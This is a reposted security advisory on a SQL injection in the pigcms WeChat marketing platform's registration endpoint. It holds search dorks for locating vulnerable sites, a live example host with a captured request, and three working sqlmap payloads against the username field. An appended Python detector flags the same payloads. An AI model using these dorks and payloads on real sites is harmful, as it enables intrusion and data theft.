
pigcms WeChat Public Account Marketing Platform Universal SQL Injection Vulnerability

Date: 2016-01-07 Source: unknown Author: admin

Vulnerability details

Disclosure status:

2015-03-10: Actively contacting the vendor and waiting for the vendor to claim the vulnerability; details not disclosed publicly
2015-04-30: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Universal SQL injection vulnerability in a WeChat public account marketing platform

Detailed description:

See WooYun: WooYun: Universal SQL injection in a WeChat public platform (leaks information on tens of thousands of merchants). This is one injection point that report missed!

Keywords: inurl:index.php?g=Home&m=Index&a=help



intitle:营销系统 inurl:login

Vulnerability location: index.php?m=Index&a=reg (registration page)

Proof of vulnerability:

Cases borrowed from earlier reports:


Here http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg is used as the example:

Test data, captured request:

Code area
POST /index.php?m=Users&a=checkreg HTTP/1.1
Host: a.t2.weixinbiz.cn
Proxy-Connection: keep-alive
Content-Length: 151
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://a.t2.weixinbiz.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CNZZDATA5524076=cnzz_eid%3D2057590716-1425359086-http%253A%252F%252Fa.t2.weixinbiz.cn%252F%26ntime%3D1425359086; PHPSESSID=97d8b8f0cfa07313d01299087bc5760f; AJSTAT_ok_pages=2; AJSTAT_ok_times=2

username=admin%27&password=123456&repassword=123456&email=212312313%40qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_ba74dd678a656f8ee0b8e7223ce58417

Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: username=admin') RLIKE IF(8823=8823,0x61646d696e,0x28) AND ('WwRy'='WwRy&password=123456&repassword=123456&email=4545644@qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin') AND (SELECT 8242 FROM(SELECT COUNT(*),CONCAT(0x3a7976633a,(SELECT (CASE WHEN (8242=8242) THEN 1 ELSE 0 END)),0x3a78716d3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('yWZv'='yWZv&password=123456&repassword=123456&email=4545644@qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=admin') AND SLEEP(5) AND ('afwa'='afwa&password=123456&repassword=123456&email=4545644@qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9


Database information:

The other sites are the same as above!

Remediation:

As above
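Added here as a defender-side example that is not part of the original report: a Python check that URL-decodes checkreg-style POST bodies and labels a `username` value carrying one of the sqlmap techniques quoted above (RLIKE boolean, FLOOR(RAND(0)*2) GROUP BY error-based, SLEEP time-based) or the bare admin' probe. The helper names and the sample bodies are constructed assumptions, not pigcms code or captured traffic.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures for the three sqlmap techniques reported against `username` on
# m=Users&a=checkreg. Order matters: the error-based payload also ends with the
# "AND ('x'=" tail that the boolean rule would otherwise catch first.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2.*group\s+by")),
    ("boolean-based blind", re.compile(r"\brlike\b|\band\s*\(\s*'[^']*'\s*=")),
]
BREAKOUT = re.compile(r"'\s*\)")  # every payload opens with admin') to close the quoted value

def classify_username(value):
    """Return a label for a suspicious username value, or None if it looks benign."""
    v = value.lower()
    for label, rx in SIGNATURES:
        if rx.search(v):
            return label
    if BREAKOUT.search(v):
        return "quote/paren break-out"
    if "'" in v:
        return "quote probe"  # the bare admin' request that started the test
    return None

def scan_post_bodies(bodies):
    """Return [(index, label)] for each URL-encoded POST body whose username looks injected."""
    hits = []
    for i, raw in enumerate(bodies):
        for value in parse_qs(raw, keep_blank_values=True).get("username", []):
            label = classify_username(value)
            if label:
                hits.append((i, label))
                break
    return hits

def body(username):  # constructed checkreg-style form body, not captured traffic
    return urlencode({"username": username, "password": "123456",
                      "repassword": "123456", "email": "test@example.com"})

# Constructed samples: a benign registration, the admin' probe, then the three sqlmap payloads quoted above.
SAMPLE_BODIES = [
    body("alice"),
    body("admin'"),
    body("admin') RLIKE IF(8823=8823,0x61646d696e,0x28) AND ('WwRy'='WwRy"),
    body("admin') AND (SELECT 8242 FROM(SELECT COUNT(*),CONCAT(0x3a7976633a,(SELECT "
         "(CASE WHEN (8242=8242) THEN 1 ELSE 0 END)),0x3a78716d3a,FLOOR(RAND(0)*2))x "
         "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('yWZv'='yWZv"),
    body("admin') AND SLEEP(5) AND ('afwa'='afwa"),
]
```

Run `scan_post_bodies(SAMPLE_BODIES)` to see the benign body skipped and the other four labelled by technique.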
